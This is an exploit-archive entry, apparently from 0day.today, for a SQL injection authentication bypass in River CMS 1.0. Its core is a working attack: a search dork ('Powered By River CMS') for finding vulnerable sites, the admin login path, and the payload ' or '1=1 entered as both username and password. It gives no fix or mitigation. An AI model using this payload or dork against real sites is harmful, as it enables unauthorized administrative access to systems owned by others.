River CMS version 1.0 SQL Injection / Authentication Bypass Vulnerability

2010-03-10T00:00:00
ID 1337DAY-ID-11242
Type zdt
Reporter Pouya Daneshmand
Modified 2010-03-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================================
River CMS version 1.0 SQL Injection / Authentication Bypass Vulnerability
=========================================================================

#################################################################
# Application Info:
# Name: River CMS
# Version: 1.0
# Vendor: http://rivercms.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered By River CMS"
#################################################################
Vulnerability:
http://site.ir/admin/
Username: ' or '1=1
Password:?' or '1=1
#################################################################




#  0day.today [2018-02-16]  #